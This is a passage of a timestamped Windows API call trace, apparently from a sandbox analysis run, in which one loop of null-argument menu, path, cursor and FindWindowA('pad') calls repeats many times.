GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.652] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.652] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.652] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.652] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.652] GetStockObject (i=6) returned 0x1b00018 [0100.652] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.652] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.652] PathFileExistsW (pszPath=0x0) returned 0 [0100.652] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.652] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.652] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.652] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.652] GetMenu (hWnd=0x0) returned 0x0 [0100.652] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.652] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.652] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.652] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.652] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.652] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.652] GetStockObject (i=6) returned 0x1b00018 [0100.652] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.652] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.652] PathFileExistsW (pszPath=0x0) returned 0 [0100.652] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.652] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.652] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.652] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.652] GetMenu (hWnd=0x0) returned 0x0 [0100.652] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xa) returned -1 [0100.652] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.652] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.652] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.652] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.653] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.653] GetStockObject (i=6) returned 0x1b00018 [0100.653] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.653] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.653] PathFileExistsW (pszPath=0x0) returned 0 [0100.653] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.653] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.653] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.653] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.653] GetMenu (hWnd=0x0) returned 0x0 [0100.653] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.653] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.653] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.653] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.653] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.653] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.653] GetStockObject (i=6) returned 0x1b00018 [0100.653] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.653] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.653] PathFileExistsW (pszPath=0x0) returned 0 [0100.653] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.653] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.653] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.653] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.653] GetMenu (hWnd=0x0) returned 0x0 [0100.653] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x348) returned -1 [0100.653] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.653] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.653] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.653] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.653] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.653] GetStockObject (i=6) returned 0x1b00018 [0100.653] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.653] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.653] PathFileExistsW (pszPath=0x0) returned 0 [0100.654] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.654] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.654] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.654] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.654] GetMenu (hWnd=0x0) returned 0x0 [0100.654] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.654] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.654] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.654] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.654] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.654] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.654] GetStockObject (i=6) returned 0x1b00018 [0100.654] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.654] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.654] PathFileExistsW (pszPath=0x0) returned 0 [0100.654] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.654] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.654] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.654] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.654] GetMenu (hWnd=0x0) returned 0x0 [0100.654] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x348) returned -1 [0100.654] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.654] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.654] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.654] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.654] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.655] GetStockObject (i=6) returned 0x1b00018 [0100.655] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.655] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.655] PathFileExistsW (pszPath=0x0) returned 0 [0100.655] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.655] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.655] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.655] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.655] GetMenu (hWnd=0x0) returned 0x0 [0100.655] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x504) returned -1 [0100.655] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.655] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.655] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.655] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.655] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.655] GetStockObject (i=6) returned 0x1b00018 [0100.655] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.655] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.656] PathFileExistsW (pszPath=0x0) returned 0 [0100.656] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.656] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.656] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.656] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.656] GetMenu (hWnd=0x0) returned 0x0 [0100.656] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.656] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.656] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.656] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.656] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.656] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.656] GetStockObject (i=6) returned 0x1b00018 [0100.656] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.656] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.656] PathFileExistsW (pszPath=0x0) returned 0 [0100.656] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.656] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.656] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.656] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.656] GetMenu (hWnd=0x0) returned 0x0 [0100.656] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.656] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.656] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.656] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.656] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.656] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.656] GetStockObject (i=6) returned 0x1b00018 [0100.656] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.656] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.656] PathFileExistsW (pszPath=0x0) returned 0 [0100.656] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.656] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.656] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.656] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.656] GetMenu (hWnd=0x0) returned 0x0 [0100.656] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.657] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.657] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.657] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.657] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.657] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.657] GetStockObject (i=6) returned 0x1b00018 [0100.657] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.657] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.657] PathFileExistsW (pszPath=0x0) returned 0 [0100.657] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.657] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.657] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.657] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.657] GetMenu (hWnd=0x0) returned 0x0 [0100.657] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x348) returned -1 [0100.657] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.657] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.657] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.657] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.657] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.657] GetStockObject (i=6) returned 0x1b00018 [0100.657] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.657] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.657] PathFileExistsW (pszPath=0x0) returned 0 [0100.657] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.657] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.657] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.657] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.657] GetMenu (hWnd=0x0) returned 0x0 [0100.657] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4d7) returned -1 [0100.657] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.657] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.657] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.657] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.657] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.657] GetStockObject (i=6) returned 0x1b00018 [0100.658] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.658] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.658] PathFileExistsW (pszPath=0x0) returned 0 [0100.658] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.658] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.658] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.658] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.658] GetMenu (hWnd=0x0) returned 0x0 [0100.658] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.658] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.658] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.658] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.658] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.658] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.658] GetStockObject (i=6) returned 0x1b00018 [0100.658] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.658] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.658] PathFileExistsW (pszPath=0x0) returned 0 [0100.658] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.658] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.658] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.658] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.658] GetMenu (hWnd=0x0) returned 0x0 [0100.658] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x343) returned -1 [0100.658] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.658] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.658] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.658] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.658] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.658] GetStockObject (i=6) returned 0x1b00018 [0100.658] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.658] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.658] PathFileExistsW (pszPath=0x0) returned 0 [0100.658] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.658] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.658] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.658] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.659] GetMenu (hWnd=0x0) returned 0x0 [0100.659] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.659] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.659] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.659] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.659] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.659] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.659] GetStockObject (i=6) returned 0x1b00018 [0100.659] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.659] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.659] PathFileExistsW (pszPath=0x0) returned 0 [0100.659] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.659] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.659] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.659] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.659] GetMenu (hWnd=0x0) returned 0x0 [0100.659] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.659] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.659] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.659] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.659] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.659] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.659] GetStockObject (i=6) returned 0x1b00018 [0100.659] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.659] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.659] PathFileExistsW (pszPath=0x0) returned 0 [0100.659] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.659] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.659] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.659] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.659] GetMenu (hWnd=0x0) returned 0x0 [0100.659] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x507) returned -1 [0100.659] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.659] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.659] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.659] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.659] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.660] GetStockObject (i=6) returned 0x1b00018 [0100.660] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.660] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.660] PathFileExistsW (pszPath=0x0) returned 0 [0100.660] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.660] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.660] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.660] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.660] GetMenu (hWnd=0x0) returned 0x0 [0100.660] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.660] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.660] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.660] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.660] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.660] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.660] GetStockObject (i=6) returned 0x1b00018 [0100.660] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.660] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.660] PathFileExistsW (pszPath=0x0) returned 0 [0100.660] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.660] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.660] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.660] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.660] GetMenu (hWnd=0x0) returned 0x0 [0100.660] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x348) returned -1 [0100.660] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.660] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.660] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.660] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.661] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.661] GetStockObject (i=6) returned 0x1b00018 [0100.661] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.661] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.661] PathFileExistsW (pszPath=0x0) returned 0 [0100.661] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.661] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.661] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 